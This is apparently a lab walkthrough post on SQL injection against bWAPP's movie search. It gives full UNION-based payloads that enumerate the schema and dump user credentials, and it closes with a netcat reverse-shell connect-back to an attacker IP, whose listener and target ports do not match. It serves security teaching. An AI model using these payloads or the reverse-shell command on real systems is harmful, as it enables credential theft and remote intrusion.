Premise
In this walkthrough post, we demonstrate how to test a SQL database that backs a search field for SQL injection. Specifically, we tested the MySQL (MariaDB) instance behind bWAPP's movie search, for demonstration purposes.
Skills Learned
- bWAPP
- OWASP
- SQL Injection
- MySQL
First, I’ll show you how to determine whether a search box is vulnerable to SQL injection. Simply entering a single quote (') into the search field triggers a SQL syntax error. That error message not only confirms the injection point but also discloses the database in use, which in this case is MariaDB (a MySQL fork, so MySQL syntax and functions apply).
Next, I’ll explain the likely structure of the backend SQL query. Understanding this query is crucial for crafting the attack: the search is most likely built with the LIKE operator and wildcard characters (%) wrapped around the user-supplied string, so an injected quote has to close that string literal before anything else can be appended.
With that knowledge, I’ll demonstrate how to determine the number of columns the original query returns, a prerequisite for any UNION-based injection. I’ll append a UNION SELECT statement and add one column per request until the error (the two SELECTs returning a different number of columns) disappears. In our case, there are seven columns.
Once we know the number of columns, we can start extracting valuable information from the database. I’ll show you how to retrieve the following:
- Database Name: using the database() function.
- Database Version: using the version() function. This can be matched against known vulnerabilities for that specific release.
- Table Names: by querying information_schema.tables.
- Column Names: by querying information_schema.columns for a specific table, such as the “users” table.
After mapping out the database, I’ll show you how to dump user credentials, including usernames and hashed passwords, from the “users” table.
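The enumeration chain above, as an added example that is not part of the original post: each statement is the full query the bWAPP movie search would execute for the listed input, assuming the query shape SELECT * FROM movies WHERE title LIKE '%<input>%' that the post infers. The table name movies, the column title, the choice of column 2 as the one echoed back into the page, and the users table columns login and password are assumptions made for the example.

```sql
-- Added example, not code from the original post or from bWAPP.
-- Assumed backend query:  SELECT * FROM movies WHERE title LIKE '%<input>%'
-- Assumed: `movies`/`title` names, column 2 is rendered in the results page,
-- and the users table has `login` and `password` columns.

-- 1. Probe. Input:  '
--    The extra quote leaves the string literal unbalanced, so MariaDB
--    returns a syntax error and names itself in the message.
SELECT * FROM movies WHERE title LIKE '%'%';

-- 2. Column count. Input:  ' UNION SELECT 1,2,3,4,5,6,7-- -
--    The quote closes the literal, UNION SELECT supplies N placeholders and
--    "-- -" comments out the trailing %'. Start at N=1 and add one per request;
--    the "different number of columns" error stops at N=7.
SELECT * FROM movies WHERE title LIKE '%' UNION SELECT 1,2,3,4,5,6,7-- -%';

-- 3. Fingerprint. Input:  ' UNION SELECT 1,database(),version(),4,5,6,7-- -
--    Placeholders that are echoed back are swapped for built-in functions.
SELECT * FROM movies WHERE title LIKE '%' UNION SELECT 1,database(),version(),4,5,6,7-- -%';

-- 4. Tables in the current schema.
--    Input:  ' UNION SELECT 1,table_name,3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()-- -
SELECT * FROM movies WHERE title LIKE '%' UNION SELECT 1,table_name,3,4,5,6,7
  FROM information_schema.tables WHERE table_schema=database()-- -%';

-- 5. Columns of the users table.
--    Input:  ' UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_name='users'-- -
SELECT * FROM movies WHERE title LIKE '%' UNION SELECT 1,column_name,3,4,5,6,7
  FROM information_schema.columns WHERE table_name='users'-- -%';

-- 6. Dump credentials. group_concat packs every user into one echoed cell.
--    Input:  ' UNION SELECT 1,group_concat(login,':',password),3,4,5,6,7 FROM users-- -
SELECT * FROM movies WHERE title LIKE '%' UNION SELECT 1,group_concat(login,':',password),3,4,5,6,7
  FROM users-- -%';
```

Two practical caveats: the comment marker must be "-- " followed by a space (hence the trailing "-" after it), otherwise MariaDB does not treat it as a comment, and group_concat output is truncated at group_concat_max_len (1024 bytes by default), so large user tables need to be paged with LIMIT instead.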
Finally, I’ll demonstrate the end goal of the attack: a reverse shell. I’ll inject a PHP code snippet to create a web shell, which lets us execute commands on the server. I’ll then set up a Netcat listener on my machine and use the web shell to make the target connect back to it, giving me an interactive shell running as the web server's user.
Technical Commands
Here are all the technical commands that I used in the video, with a note on what each one does and where it runs:

```shell
# Attacker machine: listen for the connect-back.
# As recorded, the listener port (455) does not match the port the target
# connects to below (4545); the two must be the same for the shell to land.
nc -lvp 455

# Target, via the web shell: confirm command execution and which account
# the web server runs as.
whoami

# Target, via the web shell: connect back to the attacker (192.168.1.7).
# -e takes the program to hand the connection to (e.g. -e /bin/bash) and
# only exists in netcat builds that support it.
netcat 192.168.1.7 4545 -e
```